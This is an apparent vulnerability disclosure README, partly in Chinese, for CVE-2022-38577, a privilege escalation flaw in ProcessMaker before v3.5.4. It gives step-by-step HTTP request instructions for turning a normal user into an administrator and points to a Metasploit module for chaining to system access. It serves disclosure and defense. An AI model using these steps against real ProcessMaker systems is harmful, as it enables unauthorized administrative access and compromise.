ProcessMaker 在 v3.5.4 之前版本的用户资料页面中被发现存在不安全的权限。此漏洞允许攻击者将普通用户提升为管理员。
此仓库已归档并迁移至:https://github.com/sornram9254/CVE-BBP-VDP
ProcessMaker v3.5.4 之前版本被发现用户配置文件页存在不安全的权限。该漏洞允许攻击者将普通用户提升为管理员。
* 此漏洞可与 Metasploit 模块 (ProcessMaker Plugin Upload) - exploit/multi/http/processmaker_plugin_upload 一起使用,以获得系统访问权限。
Privilege Escalation replication.
for 2.5.0 - 3.0 GA:
1. Log in as normal user.
2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".
3. Refresh page to get new role.
for 3.2.1 and before:
1. Log in as normal user.
2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"
3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"
4. Update role to escalation privileges using POST Body request:
POST /sysworkflow/en/neoclassic/roles/roles_Ajax
request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}
参考:
[x] https://nvd.nist.gov/vuln/detail/CVE-2022-38577
[x] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38577
[x] https://packetstormsecurity.com/files/168427/ProcessMaker-Privilege-Escalation.html
[x] https://drive.google.com/file/d/1iP9NYUkYEy_FGMpcnTkUWn8nGcqDT02_/view?usp=sharing